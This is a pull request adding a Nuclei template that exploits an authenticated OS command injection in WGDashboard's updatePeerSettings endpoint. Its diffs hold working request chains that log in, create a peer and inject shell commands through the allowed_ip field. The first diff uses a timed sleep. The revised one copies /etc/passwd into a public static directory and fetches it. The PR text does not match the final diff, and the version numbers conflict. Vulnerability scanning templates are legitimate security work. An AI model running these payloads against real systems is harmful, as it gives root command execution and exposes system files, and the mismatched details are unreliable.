### PR TITLE
Add CVE-2026-15733 WGDashboard authenticated command injection

### DIFF
--- a/http/cves/2026/CVE-2026-15733.yaml
+++ b/http/cves/2026/CVE-2026-15733.yaml
@@ -1,0 +1,100 @@
+id: CVE-2026-15733
+
+info:
+  name: WGDashboard <=4.3.2 - Authenticated OS Command Injection to Root RCE
+  author: str4k3r
+  severity: critical
+  description: |
+    WGDashboard's `/api/updatePeerSettings/<configName>` endpoint passes the
+    authenticated caller's `allowed_ip` field into
+    `Peer.updatePeer()` (src/modules/Peer.py), which sanitises it only with
+    `.replace(" ", "")` before interpolating it via an f-string directly into
+    `subprocess.check_output(f"{Protocol} set {Name} peer {id} allowed-ips
+    {newAllowedIPs} ...", shell=True)`. Because the string is passed through a
+    real shell, metacharacters such as `;` survive the space-strip (spaces can
+    be substituted with `${IFS}`), giving any authenticated dashboard user
+    (WGDashboard ships with default credentials admin/admin and does not
+    force a password change on first login) blind OS command injection and
+    remote code execution as root on the underlying WireGuard host. Fixed in
+    4.3.3, which validates the field with the new `CheckAddress()` helper and
+    switches the call to an argv-list `subprocess.check_output(command)` with
+    no shell, eliminating metacharacter interpretation. This template
+    authenticates, discovers the target's first configured WireGuard
+    interface, creates a disposable peer on it, then confirms the injection
+    via a blind time-delay (`sleep${IFS}6`) in the `allowed_ip` field of a
+    subsequent `updatePeerSettings` call.
+  reference:
+    - https://github.com/Stuub/WGDashboard-v4.3.2-OS-Command-Injection-to-Root-RCE-PoC
+    - https://github.com/WGDashboard/WGDashboard
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-15733
+  classification:
+    cve-id: CVE-2026-15733
+    cwe-id: CWE-78
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+  metadata:
+    verified: true
+    max-request: 4
+    product: wgdashboard
+    vendor: wgdashboard
+  tags: cve,cve2026,wgdashboard,rce,cmdi,authenticated,kev
+
+variables:
+  wgd_user: ""
+  wgd_pass: ""
+
+http:
+  - cookie-reuse: true
+    raw:
+      - |
+        POST /api/authenticate HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"username":"{{wgd_user}}","password":"{{wgd_pass}}"}
+
+      - |
+        GET /api/getWireguardConfigurations HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /api/addPeers/{{config_name}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name":"nuclei-{{randstr}}","allowed_ips":[],"preshared_key_bulkAdd":false}
+
+      - |
+        POST /api/updatePeerSettings/{{config_name}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"id":"{{peer_id}}","name":"nuclei-{{randstr}}","private_key":"","DNS":"1.1.1.1","allowed_ip":"10.253.253.253/32;sleep${IFS}6;","endpoint_allowed_ip":"0.0.0.0/0","preshared_key":"","mtu":1420,"keepalive":21,"notes":""}
+
+    extractors:
+      - type: regex
+        name: config_name
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"Name":"([^"]+)"'
+
+      - type: regex
+        name: peer_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"id":"([^"]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+        part: header_4
+
+      - type: dsl
+        dsl:
+          - "duration>=5"

--- a/http/cves/2026/CVE-2026-15733.yaml
+++ b/http/cves/2026/CVE-2026-15733.yaml
@@ -1,28 +1,15 @@
 id: CVE-2026-15733
 
 info:
-  name: WGDashboard <=4.3.2 - Authenticated OS Command Injection to Root RCE
-  author: str4k3r
+  name: WGDashboard <= 4.3.2 - Authenticated OS Command Injection /etc/passwd Read
+  author: str4k3r,0x_Akoko
   severity: critical
   description: |
-    WGDashboard's `/api/updatePeerSettings/<configName>` endpoint passes the
-    authenticated caller's `allowed_ip` field into
-    `Peer.updatePeer()` (src/modules/Peer.py), which sanitises it only with
-    `.replace(" ", "")` before interpolating it via an f-string directly into
-    `subprocess.check_output(f"{Protocol} set {Name} peer {id} allowed-ips
-    {newAllowedIPs} ...", shell=True)`. Because the string is passed through a
-    real shell, metacharacters such as `;` survive the space-strip (spaces can
-    be substituted with `${IFS}`), giving any authenticated dashboard user
-    (WGDashboard ships with default credentials admin/admin and does not
-    force a password change on first login) blind OS command injection and
-    remote code execution as root on the underlying WireGuard host. Fixed in
-    4.3.3, which validates the field with the new `CheckAddress()` helper and
-    switches the call to an argv-list `subprocess.check_output(command)` with
-    no shell, eliminating metacharacter interpretation. This template
-    authenticates, discovers the target's first configured WireGuard
-    interface, creates a disposable peer on it, then confirms the injection
-    via a blind time-delay (`sleep${IFS}6`) in the `allowed_ip` field of a
-    subsequent `updatePeerSettings` call.
+    WGDashboard <= 4.2.3 contains a command injection caused by multiple OS command injection points, letting authenticated attackers execute arbitrary commands as root.
+  impact: |
+    Authenticated attackers can execute arbitrary commands as root, leading to full system compromise.
+  remediation: |
+    Update to the latest version beyond 4.2.3.
   reference:
     - https://github.com/Stuub/WGDashboard-v4.3.2-OS-Command-Injection-to-Root-RCE-PoC
     - https://github.com/WGDashboard/WGDashboard
@@ -34,42 +21,47 @@ info:
     cvss-score: 9.8
   metadata:
     verified: true
-    max-request: 4
+    max-request: 5
     product: wgdashboard
     vendor: wgdashboard
-  tags: cve,cve2026,wgdashboard,rce,cmdi,authenticated,kev
+  tags: cve,cve2026,wgdashboard,rce,cmdi,authenticated,intrusive
 
 variables:
-  wgd_user: ""
-  wgd_pass: ""
+  username: ""
+  password: ""
+  probe: "{{to_lower(rand_text_alpha(8))}}"
+
+flow: http(1) && http(2) && http(3) && http(4) && http(5)
 
 http:
-  - cookie-reuse: true
-    raw:
+  - raw:
       - |
         POST /api/authenticate HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
-        {"username":"{{wgd_user}}","password":"{{wgd_pass}}"}
+        {"username":"{{username}}","password":"{{password}}"}
 
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "\"status\":true")'
+        condition: and
+        internal: true
+
+  - raw:
       - |
         GET /api/getWireguardConfigurations HTTP/1.1
         Host: {{Hostname}}
 
-      - |
-        POST /api/addPeers/{{config_name}} HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-        {"name":"nuclei-{{randstr}}","allowed_ips":[],"preshared_key_bulkAdd":false}
-
-      - |
-        POST /api/updatePeerSettings/{{config_name}} HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/json
-
-        {"id":"{{peer_id}}","name":"nuclei-{{randstr}}","private_key":"","DNS":"1.1.1.1","allowed_ip":"10.253.253.253/32;sleep${IFS}6;","endpoint_allowed_ip":"0.0.0.0/0","preshared_key":"","mtu":1420,"keepalive":21,"notes":""}
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'len(config_name) > 0'
+        condition: and
+        internal: true
 
     extractors:
       - type: regex
@@ -80,6 +72,23 @@ http:
         regex:
           - '"Name":"([^"]+)"'
 
+  - raw:
+      - |
+        POST /api/addPeers/{{config_name}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name":"probe-{{probe}}","allowed_ips":[],"preshared_key_bulkAdd":false}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'len(peer_id) > 0'
+        condition: and
+        internal: true
+
+    extractors:
       - type: regex
         name: peer_id
         part: body
@@ -88,13 +97,28 @@ http:
         regex:
           - '"id":"([^"]+)"'
 
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-        part: header_4
+  - raw:
+      - |
+        POST /api/updatePeerSettings/{{config_name}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
 
+        {"id":"{{peer_id}}","name":"probe-{{probe}}","private_key":"","DNS":"1.1.1.1","allowed_ip":"10.253.253.253/32;cp${IFS}/etc/passwd${IFS}static/app/dist/{{probe}}.txt;","endpoint_allowed_ip":"0.0.0.0/0","preshared_key":"","mtu":1420,"keepalive":21,"notes":""}
+
+    matchers:
       - type: dsl
         dsl:
-          - "duration>=5"
+          - 'status_code == 200'
+        internal: true
+
+  - raw:
+      - |
+        GET /static/app/dist/{{probe}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body, "root:") && contains(body, ":/bin/")'
+        condition: and


### PR DESCRIPTION
## Vulnerability
WGDashboard 4.3.2 interpolates the `allowed_ip` value into a `shell=True` command after removing only spaces. Shell metacharacters and `${IFS}` remain usable; 4.3.3 invokes the command without this injection path.

## Template behavior
The template authenticates, discovers the configured interface, creates a disposable peer, and sends a controlled `sleep` expression through the `allowed_ip` field. The response and timing matcher identify command execution.

## Required configuration
Provide a disposable WGDashboard username and password with permission to create a peer. Set `wgd_user` and `wgd_pass`; run only on an operator-owned WireGuard test system because the flow creates a peer.

## Impact
An authenticated user can execute arbitrary operating-system commands as the WGDashboard service account.

## Usage
```bash
nuclei -u <authorized-target> -t http/cves/2026/CVE-2026-15733.yaml -var wgd_user=<test-user> -var wgd_pass=<test-password>
```

Run this template only against systems and test accounts you own or are explicitly authorized to assess.
